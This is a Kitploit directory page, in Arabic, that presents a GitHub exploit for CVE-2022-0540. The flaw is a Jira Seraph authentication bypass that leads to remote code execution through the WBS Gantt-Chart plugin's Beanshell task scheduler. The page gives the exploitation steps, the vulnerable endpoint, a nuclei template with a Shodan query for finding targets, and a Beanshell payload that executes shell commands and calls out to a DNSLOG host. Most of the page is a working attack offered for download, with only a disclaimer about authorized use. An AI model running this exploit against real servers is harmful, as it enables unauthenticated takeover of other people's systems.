Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-0540-RCE — Atlassian Jira Seraph تجاوز المصادقة وتنفيذ التعليمات البرمجية عن بُعد(CVE-2022-0540) | Kitploit
أدوات/GitHubGitHub/pear1y/cve-2022-0540-rce
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالمصادقةتطوير الحمولات
GitHubpear1y/cve-2022-0540-rce

CVE-2022-0540-RCE

Atlassian Jira Seraph تجاوز المصادقة وتنفيذ التعليمات البرمجية عن بُعد(CVE-2022-0540)

عرض المستودع
71133منذ 4 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Atlassian Jira Seraph تجاوز المصادقة وتنفيذ الأكواد عن بُعد(CVE-2022-0540)

English • 中文

تفاصيل الاستغلال

كما هو موضح في مدونة المؤلف، قدمت Atlassian قائمة طويلة من الإضافات المتأثرة (الغالبية العظمى منها كانت نتائج إيجابية كاذبة)، وأدرج المؤلف العديد من الإضافات المتأثرة الفعلية

image-20220525190523282

وفقًا للشروط الموضحة، وبالاقتران مع التوثيق الرسمي لـ WBS Gantt-Chart for Jira

image-20220525190607569

بشكل أساسي، إنها ثغرة تنفيذ الأكواد عن بُعد (RCE) باستخدام نص Beanshell الخاص بوحدة جدولة المهام Task، وتفاصيل الاستغلال كما يلي.

  1. للتشغيل اليدوي، يُفضَّل استخدام وظيفة الاستبدال في BurpSuite وهي Proxy > Options > Match and Replace، وتعديل القاعدة.

image-20220525190640472
  1. استخدم Burp كوسيط للوصول إلى برنامج Jira المتأثر، وافتح http://IP:PORT/secure/WBSGanttManageScheduleJobAction.jspa; ثم يمكنك التحقق من job scheduler configuration

image-20220525190657966

نظرًا لأن نص Beanshell النهائي يتم تنفيذه كمهمة مجدولة، يمكنك تعديل فترة التنفيذ لراحتك من خلال النقر على Edit وتعديلها وفقًا لتنسيق Cron.

  1. إنشاء Task

image-20220525190713512

  1. تكوين Task

image-20220525190728145

بعد اكتمال التكوين، انقر على Update ولكن سيتم الانتقال إلى صفحة تسجيل الدخول، لا تقلق، فقد تمت إضافة Task فعليًا في الخلفية.

  1. تفعيل Task

image-20220525190740547

يكون Task المنشأ حديثًا بحالة Disable افتراضيًا، وتحتاج إلى تغييره إلى Enable يدويًا ثم الانتظار بضع ثوانٍ حتى يتم تنفيذ Script.

  1. سجل DNSLOG

image-20220525190756503

في الوقت نفسه، يمكنك العثور على رسالة تؤكد اكتمال التنفيذ في مجدول الوظائف.

image-20220525190830668


المتطلبات الأساسية

root@kitploit:~
WBS Gantt-Chart for Jira <= 9.14.3.1

التحقق من قابلية الاستغلال

root@kitploit:~
id: CVE-2022-0540

info:
  name: Atlassian Jira Seraph - Authentication Bypass Verify Exploitable(CVE-2022-0540)
  author: DhiyaneshDK
  severity: critical
  description: |
    Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0.
  reference:
    - https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0540
    - https://confluence.atlassian.com/display/JIRA/Jira+Security+Advisory+2022-04-20
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0540
    cwe-id: CWE-287
  metadata:
    shodan-query: http.component:"Atlassian Jira"
  tags: cve,cve2022,atlassian,jira,exposure,auth-bypass

requests:
  - method: GET
    path:
      - '{{BaseURL}}/secure/WBSGanttManageScheduleJobAction.jspa;'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'WBS Gantt-Chart'

      - type: regex
        regex:
          - '<td headers="name">([.|\D]*?)</td>'
        dsl: []

      - type: status
        status:
          - 200

التشغيل التجريبي

root@kitploit:~
nuclei -l targets.txt -t exploit.yaml

لقطة شاشة

image-20220525173951955

المراجع

https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/

https://ricksoft-support.atlassian.net/wiki/spaces/WGCE0914/pages/2930802887/Global+job+scheduler+settings+-+aggregating+reflecting+time+tracking+and+calculating+progress+rate

نص Beanshell

root@kitploit:~
import java.io.IOException;
import java.lang.*;

Runtime runtime = Runtime.getRuntime();

try {

    String command = "ping -nc 1 55d2721a.dns.1433.eu.org";

    if (System.getProperty("os.name").toLowerCase().contains("windows")) {
    	runtime.exec(new String[]{"cmd.exe", "/c", command});
    } else {
    	runtime.exec(new String[]{"/bin/bash", "-c", command});
    }

} catch (IOException e) {
    e.printStackTrace();
}

المعلومات المذكورة في هذه المقالة مخصصة للاستخدام المشروع والمصرح به في اختبار الاختراق والفحوصات الأمنية الداخلية للشركات وأغراض البحث فقط. يتحمل المستخدم المسؤولية الكاملة عن أي عواقب سلبية تنشأ عن استخدام المعلومات الواردة في هذه المقالة.

تنزيل الأداة